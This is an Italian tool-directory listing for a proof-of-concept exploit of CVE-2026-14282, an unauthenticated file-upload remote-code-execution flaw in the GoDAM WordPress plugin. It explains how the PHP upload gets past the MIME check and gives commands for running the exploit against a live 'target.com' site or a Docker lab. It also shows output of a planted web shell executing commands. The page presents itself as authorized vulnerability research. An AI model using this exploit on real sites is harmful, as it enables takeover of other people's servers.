Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-14282 — GoDAM WordPress plugin <= 1.12.2 unauthenticated file upload RCE (CVE-2026-14282) | Kitploit
Strumenti/GitHubGitHub/nullwhisper/cve-2026-14282
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLabs & Practice
GitHubnullwhisper/cve-2026-14282

CVE-2026-14282

GoDAM WordPress plugin <= 1.12.2 unauthenticated file upload RCE (CVE-2026-14282)

Vedi Repository
18 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-14282 — Plugin WordPress GoDAM <= 1.12.2 caricamento file non autenticato -> RCE

Autore: nullwhisper
Caso d'uso: solo ricerca di sicurezza autorizzata / validazione di vulnerabilità.

Cos'è?

Le versioni <= 1.12.2 del plugin WordPress GoDAM registrano un campo WPForms chiamato godam_record. Il gestore di upload save_video_file() è agganciato all'azione pubblica wpforms_process_before_filter, quindi viene eseguito prima di qualsiasi controllo di autenticazione. Il gestore si fida dell'header Content-Type controllato dall'attaccante, accetta un file PHP purché il tipo MIME inizi con video/, e lo sposta nella directory servita dal web wp-content/uploads/godam/wpforms/. Questo consente a un attaccante non autenticato di caricare ed eseguire codice PHP arbitrario.

  • CVE: CVE-2026-14282
  • Prodotto: plugin WordPress GoDAM
  • Versioni interessate: <= 1.12.2
  • Corretta in: 2.0.0
  • Tipo: Caricamento arbitrario di file senza autenticazione che porta a RCE
  • CVSS: 9.8 (Critico)

Riferimenti

  • IONIX advisory: https://www.ionix.io/threat-center/cve-2026-14282/
  • CVE Record: https://www.cve.org/CVERecord?id=CVE-2026-14282
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-14282
  • Pagina del plugin su WordPress.org: https://wordpress.org/plugins/godam/

File

root@kitploit:~
.
├── cve_2026_14282_poc.py   # Main PoC
├── lab/
│   ├── docker-compose.yml  # WordPress lab
│   └── setup.php           # Creates a WPForms form with GoDAM field
├── requirements.txt
└── README.md

Installazione

root@kitploit:~
pip3 install -r requirements.txt

Utilizzo

Target live

root@kitploit:~
python3 cve_2026_14282_poc.py -u https://target.com/page-with-form

Lo script rileva automaticamente l'ID del modulo WPForms e l'ID del campo GoDAM. Se la pagina contiene più moduli o la rilevazione fallisce, usa:

root@kitploit:~
python3 cve_2026_14282_poc.py -u https://target.com/page-with-form \
    --form-id 4 --field-id 1 --cmd "whoami"

Laboratorio locale

  1. Scarica i plugin vulnerabili (non ridistribuire i binari):

    root@kitploit:~
    mkdir -p lab/wpforms-lite lab/godam
    cd lab/wpforms-lite
    wget https://downloads.wordpress.org/plugin/wpforms-lite.latest-stable.zip
    unzip wpforms-lite.latest-stable.zip
    rm wpforms-lite.latest-stable.zip
    cd ../godam
    wget https://downloads.wordpress.org/plugin/godam.1.12.2.zip
    unzip godam.1.12.2.zip
    rm godam.1.12.2.zip
    cd ../..
    
  2. Avvia il laboratorio:

    root@kitploit:~
    cd lab
    docker compose up -d
    
  3. Completa l'installazione di WordPress all'indirizzo http://127.0.0.1:8092.

  4. Installa e attiva i plugin, poi crea il modulo e la pagina di test:

    root@kitploit:~
    docker exec -i lab-wpcli-1 wp plugin activate wpforms-lite --allow-root
    docker exec -i lab-wpcli-1 wp plugin activate godam --allow-root
    docker exec -i lab-wpcli-1 php /tmp/setup.php
    
  5. Esegui il PoC:

    root@kitploit:~
    python3 cve_2026_14282_poc.py -u 'http://127.0.0.1:8092/?page_id=7' --cmd 'echo PWNED'
    

Verificato su localhost

Testato su WordPress 6.8 + WPForms Lite ultima versione + GoDAM 1.12.2.

root@kitploit:~
[*] Detecting WPForms form and GoDAM field...
[*] Found form ID 4, GoDAM field(s): 1
[*] Trying upload via field 1...
[+] Shell uploaded and executed: http://127.0.0.1:8092/wp-content/uploads/godam/wpforms/godam-shell.php
[+] Output: GODAM-RCE-Linux ... uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Command output:
GODAM-RCE-Linux ... PWNED

Perché i binari dei plugin non sono inclusi

Questo repository contiene solo il PoC e i file di orchestrazione del laboratorio. I binari dei plugin vulnerabili sono esclusi per evitare appesantimento e problemi di distribuzione. Scarica le versioni vulnerabili specifiche da WordPress.org per il tuo laboratorio.

Dichiarazione di non responsabilità

Questo strumento è destinato esclusivamente a test di sicurezza e ricerca autorizzati. Non usarlo contro sistemi che non possiedi o per i quali non hai il permesso esplicito di effettuare test. L'autore non è responsabile di usi impropri o danni causati da questo codice.

Scarica lo strumento